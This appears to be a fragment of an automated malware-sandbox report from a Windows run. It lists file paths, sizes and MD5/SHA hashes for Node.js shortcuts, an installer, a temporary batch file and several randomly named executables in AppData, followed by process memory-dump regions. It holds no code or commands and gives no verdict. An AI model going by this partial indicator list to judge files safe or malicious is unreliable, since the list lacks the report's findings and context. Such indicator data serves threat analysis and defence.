SHA1bc0836bb52f49c2050731f4428b88876f20f90c0
SHA2565dd3633788c9ab900e00327ccce6eaedf6c2efb88575bf384fb0630b79d6fae8
SHA51208b3eb950be177e22127e5a1e90cecc511141d7a1de99ceea46e2476ecb90e350114bee318942339c721c156fc9cb3b4a5a6ad31881892f5f287e4f701cb64c6
-
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Node.js\Node.js documentation.urlFilesize
168B
MD51c1f6159630c170b596af7c9085f8bb0
SHA1ac26cfe43e10a9f76aee943f9ceff3dc77df29fd
SHA25661403502b3d584ab749a417955dda3d6c956e64109cc4ac4e46e44b462b7c4f0
SHA512f93d2e86c287ed4e50a0c00bcd9594c322cfbd0507bbd191d97c7dd2881850296986139df9580ba1bbaae8abab284335db64c41f6edde441e34fa56b934c3046
-
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Node.js\Node.js website.urlFilesize
133B
MD535b86e177ab52108bd9fed7425a9e34a
SHA176a1f47a10e3ab829f676838147875d75022c70c
SHA256afaa6c6335bd3db79e46fb9d4d54d893cee9288e6bb4738294806a9751657319
SHA5123c8047c94b789c8496af3c2502896cef2d348ee31618893b9b71244af667ec291dcb9b840f869eb984624660086db0c848d1846aa601893e6f9955e56da19f62
-
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Node.js\Node.js.lnkFilesize
949B
MD5728032881002ef776c661e7b37fc7052
SHA1ebed662012e2781627f557583fa5ccd2f07cfa2b
SHA256e3300abeb76203665714a403c903e7ea3075637394c9e831ad890933afca61ce
SHA5129060369d341a7ffaf60838a6ab8b1dcf47f82eb88cfc37aa946c4374b1f6a9bc373c9cbf11f78c81023566ca3c3b83902553834f566a6d10a9a648085a279164
-
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Node.js\Uninstall Node.js.lnkFilesize
940B
MD51d052dd1504ab48522460df001ce0abb
SHA1394d8bd259deb84d9af3aa3a77ce66744b9b1998
SHA2568bbad8d800a8eae4ce18180f1b626392c13d1df400d3051657bf5edb7b1ef66a
SHA512b0a58e92356dcae1ddc5d8fae1d3b308f827e3da5fc8601d41a42b5fb3cda8d0fcdd2a4109c1c4052a343a02559dfba2299b1201f9db8e18c58edb88b610bebb
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\698460A0B6E60F2F602361424D832905_8BB23D43DE574E82F2BEE0DF0EC47EEBFilesize
400B
MD5ffaa07c943849d9e0021f24f19cc2b57
SHA18d587f59c0869f16698c015c135da83c3075f800
SHA256313ab6a2a7a4225f29a833b375b176afe6434fe3c476fe271d435cecb5c7e2d9
SHA512cb182242546446d8e93773f2b7d5202b92559c33dbde206dbdb43e618750442b129c3ec9f824e98774379a70b0416915e6db6bfc9a6e8d4a6a1666c568eaceed
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8EC9B1D0ABBD7F98B401D425828828CE_0D7BFF9D231ADDC3439B70E4C5E809D4Filesize
404B
MD5f4113ce9bd31c66a7b2ee8203e94ffc0
SHA1fe9f7635278d8753994ad2dc4949ced8a45eab3a
SHA256c07c5e5bc47bcbddc7175c1fc54724458012b6f648a10a1c2966300085e189af
SHA51261762e4daf2b7e4de48482f88dd723b31e624e75f84ab944326f8ee6c94cf92637056b9e8ac4a92a399d118bb6bf7badb3fa1dd86876731dcfc4315a8715886b
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141Filesize
412B
MD5edf93434fafb973805fd16995e5f888e
SHA1a9028a9eae8f355c6a6e614a62fbfd6684f18bad
SHA2567eadbe0b79c67c9c3eae723c3cbb2dd30b0596c5731049bf9fae76378d7f9b93
SHA51256eeea319ca763a0df27871ecf00021ef3cb37f35ff23575e788121ffe579abb47e0bfaf81e65b40e46d959a59780db4ac1fd0f714befe02b257e47cb28e7b5f
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
3KB
MD5556084f2c6d459c116a69d6fedcc4105
SHA1633e89b9a1e77942d822d14de6708430a3944dbc
SHA25688cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8
SHA5120f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.dbFilesize
28KB
MD5da108bd8ddf8d7c5cb6af40590482493
SHA17680278b37e38d0f43b6238fde8a6cf7ddd22f76
SHA2567a18f345e6d81dca7137c13cc4e520bfaac87e149900c09991606e5f7ac3ac92
SHA5122124c50db4c568f9250a679d70590881453fac46600303eed56ed49af57f5d6b08cc6630bdf65c9fbb5c4d0e0cec9ca0d1574aca593b4e8dbe43510f602e531a
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD5a5c074e56305e761d7cbc42993300e1c
SHA139b2e23ba5c56b4f332b3607df056d8df23555bf
SHA256e75b17396d67c1520afbde5ecf8b0ccda65f7833c2e7e76e3fddbbb69235d953
SHA512c63d298fc3ab096d9baff606642b4a9c98a707150192191f4a6c5feb81a907495b384760d11cecbff904c486328072548ac76884f14c032c0c1ae0ca640cb5e8
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD5d4ff23c124ae23955d34ae2a7306099a
SHA1b814e3331a09a27acfcd114d0c8fcb07957940a3
SHA2561de6cfd5e02c052e3475d33793b6a150b2dd6eebbf0aa3e4c8e4e2394a240a87
SHA512f447a6042714ae99571014af14bca9d87ede59af68a0fa1d880019e9f1aa41af8cbf9c08b0fea2ccb7caa48165a75825187996ea6939ee8370afa33c9f809e79
-
C:\Users\Admin\AppData\Local\Temp\4A28.tmp\4A29.tmp\4A2A.batFilesize
1KB
MD52b49f09f8e1785bf2e5c79d0f2bc7389
SHA105d68482ab1db17e11fef25fae270c3b784000ae
SHA256706536e5077fcb4e5e4dd2f77d40f492e7ab6b12065cdc0b450fdd483f436279
SHA512ba8cc161086caa5beb691191ff10f1408e68be79a075d0a653716df497cec762b7767783a0dc91bcba2f260df0fa9ff77e9cf982a364135a18c281e50564bc0a
-
C:\Users\Admin\AppData\Local\Temp\4A28.tmp\nodejs-installer.msiFilesize
25.3MB
MD50df081aa47e7159e585488a161a97466
SHA12dc9a592dbb208624aff11a57f97bea89a315973
SHA25620c578361911d7b0cf153b293b025970eca383a2c802e0df438ac254aaca165d
SHA5122e1b58add6a714281f2ddeb936069c0eb8ce24ae2e440941379c4273afd7f1a96b162d5b88211e8678804bad652e48c99a4993e0e0d0da4d1abd7550d397e836
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1ovwypcy.1ou.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Roaming\5nkjivka.0do0.exeFilesize
5.2MB
MD5f55fc8c32bee8f7b2253298f0a0012ba
SHA1574c7a8f3eb378c03f58bc96252769296b20970e
SHA256cf3389f2b5fb30f790542cd05deb5cb3b9bb10f828b8822cce1c0b83da9d6eb9
SHA512c956fb150b34d3928eed545644cbf7914e7db3b079d4f260b9f40bf62aaf4432b4cdfd32c99abc9cd7ca79e66d0751d4a30c47087c39a38865b69dc877ac8f2a
-
C:\Users\Admin\AppData\Roaming\5nkjivka.0do1.exeFilesize
423KB
MD5448e72d5b4a0ab039607cbaf93707732
SHA1bbb85f7a6b8915d6a6739aa4f80be2766c62eb9f
SHA256df97eb504ed5a3298737f83d418d70025f3be0daf56d6ccae35ec0d2ef813b20
SHA512a4f82bb6385e1259e082128604e4232e2f0f3436d8fa8aa04ce3b0d42c943b8b3da4ffb74e307ba7243801b5b48ca07848cc8d029fc8a36cfb90e50ebaaba6a4
-
C:\Users\Admin\AppData\Roaming\5nkjivka.0do2.exeFilesize
89KB
MD5a3b2fcf0c05bb385115894d38c2e6c44
SHA132cf50911381bbec1dad6aec06c2a741bd5d8213
SHA256dbfe02373aa15cc50414561f2bf486b69a11cd9cd50217608c1d18d17e72cae1
SHA512fe58a5d238ac39a269897c176de08d0ad2726bb2ea1636f0d383a1484263e43d0878f0b5f4ebee8a10f3db8e72ab9b36b861e29a6a9b6429fa3e51ec7546dee2
-
C:\Windows\Installer\MSI419E.tmpFilesize
341KB
MD574528af81c94087506cebcf38eeab4bc
SHA120c0ddfa620f9778e9053bd721d8f51c330b5202
SHA2562650b77afbbc1faacc91e20a08a89fc2756b9db702a8689d3cc92aa163919b34
SHA5129ce76594f64ea5969fff3becf3ca239b41fc6295bb3abf8e95f04f4209bb5ccddd09c76f69e1d3986a9fe16b4f0628e4a5c51e2d2edf3c60205758c40da04dae
-
C:\Windows\Installer\MSID467.tmpFilesize
125KB
MD5a6c7f0c329b28edb3e7f10d115d85c6d
SHA1f36faaf4af452ab0bcd30ef66de7291bcee21264
SHA2568f2e81c6f8ccd01dd1727cf93b82fe35b3abb8cf1ef3045dcd6cdf3346a59d03
SHA512d7fb6997c9ff0dae74634422b8953a276604c0aa27b1e8d9ce4c87220fd469c6eecac6d86da857ff75378c535d2a684b4a120927c62f5267f1bd4dbdc05a72cf
-
C:\Windows\Installer\MSID4A7.tmpFilesize
390KB
MD580bebea11fbe87108b08762a1bbff2cd
SHA1a7ec111a792fd9a870841be430d130a545613782
SHA256facf518f88cd67afd959c99c3ba233f78a4fbfe7fd3565489da74a585b55e9d1
SHA512a760debb2084d801b6381a0e1dcef66080df03a768cc577b20b8472be87ad8477d59c331159555de10182d87340aa68fe1f3f5d0212048fd7692d85f4da656f6
-
memory/380-109-0x000001827D600000-0x000001827D62B000-memory.dmpFilesize
172KB
-
memory/380-110-0x00007FFA65D30000-0x00007FFA65D40000-memory.dmpFilesize
64KB
-
memory/616-100-0x0000022DEBE60000-0x0000022DEBE8B000-memory.dmpFilesize
172KB
-
memory/616-99-0x0000022DEBE30000-0x0000022DEBE54000-memory.dmpFilesize
144KB
-
memory/616-101-0x00007FFA65D30000-0x00007FFA65D40000-memory.dmpFilesize
64KB
-
memory/672-104-0x000001EB44630000-0x000001EB4465B000-memory.dmpFilesize
172KB
-
memory/672-105-0x00007FFA65D30000-0x00007FFA65D40000-memory.dmpFilesize
64KB
-
memory/684-113-0x000001E0DBE60000-0x000001E0DBE8B000-memory.dmpFilesize
172KB
-
memory/684-114-0x00007FFA65D30000-0x00007FFA65D40000-memory.dmpFilesize
64KB
-
memory/952-116-0x0000014FB77A0000-0x0000014FB77CB000-memory.dmpFilesize
172KB
-
memory/952-117-0x00007FFA65D30000-0x00007FFA65D40000-memory.dmpFilesize
64KB
-
memory/1032-124-0x000001C23E4B0000-0x000001C23E4DB000-memory.dmpFilesize
172KB
-
memory/1032-125-0x00007FFA65D30000-0x00007FFA65D40000-memory.dmpFilesize
64KB
-
memory/1116-127-0x00000176C99B0000-0x00000176C99DB000-memory.dmpFilesize
172KB
-
memory/1116-128-0x00007FFA65D30000-0x00007FFA65D40000-memory.dmpFilesize
64KB
-
memory/1144-130-0x000001FD42520000-0x000001FD4254B000-memory.dmpFilesize
172KB
-
memory/1144-131-0x00007FFA65D30000-0x00007FFA65D40000-memory.dmpFilesize
64KB
-
memory/1152-134-0x00007FFA65D30000-0x00007FFA65D40000-memory.dmpFilesize
64KB
-
memory/1152-133-0x0000029C546B0000-0x0000029C546DB000-memory.dmpFilesize
172KB
-
memory/1188-137-0x00007FFA65D30000-0x00007FFA65D40000-memory.dmpFilesize
64KB
-
memory/1188-136-0x0000016980090000-0x00000169800BB000-memory.dmpFilesize
172KB
-
memory/1276-142-0x00000211959D0000-0x00000211959FB000-memory.dmpFilesize
172KB
-
memory/1920-92-0x0000000140000000-0x000000014002B000-memory.dmpFilesize
172KB
-
memory/1920-96-0x0000000140000000-0x000000014002B000-memory.dmpFilesize
172KB
-
memory/1920-88-0x0000000140000000-0x000000014002B000-memory.dmpFilesize
172KB
-
memory/1920-89-0x0000000140000000-0x000000014002B000-memory.dmpFilesize
172KB
-
memory/1920-93-0x00007FFAA5CB0000-0x00007FFAA5EA5000-memory.dmpFilesize
2.0MB
-
memory/1920-94-0x00007FFAA4060000-0x00007FFAA411E000-memory.dmpFilesize
760KB
-
memory/1920-90-0x0000000140000000-0x000000014002B000-memory.dmpFilesize
172KB
-
memory/1920-87-0x0000000140000000-0x000000014002B000-memory.dmpFilesize
172KB
-
memory/3752-70-0x0000000000EF0000-0x0000000000EF9000-memory.dmpFilesize
36KB
-
memory/3752-76-0x00000000773F0000-0x0000000077605000-memory.dmpFilesize
2.1MB
-
memory/3752-74-0x00007FFAA5CB0000-0x00007FFAA5EA5000-memory.dmpFilesize
2.0MB
-
memory/3752-73-0x0000000002BB0000-0x0000000002FB0000-memory.dmpFilesize
4.0MB
-
memory/4540-2582-0x00000250E70E0000-0x00000250E7886000-memory.dmpFilesize
7.6MB
-
memory/4756-17-0x00007FFA87260000-0x00007FFA87D21000-memory.dmpFilesize
10.8MB
-
memory/4756-16-0x00007FFA87260000-0x00007FFA87D21000-memory.dmpFilesize
10.8MB
-
memory/4756-8-0x00000199FA750000-0x00000199FA772000-memory.dmpFilesize
136KB
-
memory/4756-13-0x00007FFA87260000-0x00007FFA87D21000-memory.dmpFilesize
10.8MB
-
memory/4756-51-0x00007FFA87260000-0x00007FFA87D21000-memory.dmpFilesize
10.8MB
-
memory/4756-14-0x00007FFA87260000-0x00007FFA87D21000-memory.dmpFilesize
10.8MB
-
memory/4756-15-0x00007FFA87260000-0x00007FFA87D21000-memory.dmpFilesize
10.8MB
-
memory/4832-1-0x0000000000930000-0x0000000000938000-memory.dmpFilesize
32KB
-
memory/4832-0-0x00007FFA87263000-0x00007FFA87265000-memory.dmpFilesize
8KB
-
memory/4844-65-0x00000000037E0000-0x0000000003BE0000-memory.dmpFilesize
4.0MB
-
memory/4844-71-0x0000000000BD0000-0x0000000000C4E000-memory.dmpFilesize
504KB
-
memory/4844-46-0x0000000000BD0000-0x0000000000C4E000-memory.dmpFilesize
504KB
-
memory/4844-69-0x00000000773F0000-0x0000000077605000-memory.dmpFilesize
2.1MB
-
memory/4844-66-0x00000000037E0000-0x0000000003BE0000-memory.dmpFilesize
4.0MB
-
memory/4844-67-0x00007FFAA5CB0000-0x00007FFAA5EA5000-memory.dmpFilesize
2.0MB